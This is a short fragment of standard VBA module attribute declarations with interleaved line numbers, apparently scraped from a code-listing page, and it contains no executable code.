                      Attribute VB_GlobalNameSpace = False

                      4

                      Attribute VB_Creatable = False

                      5

                      Attribute VB_PredeclaredId = True

                      6

                      Attribute VB_Exposed = True

                      7

                      Attribute VB_TemplateDerived = False

                      8

                      Attribute VB_Customizable = True

                      Reset < >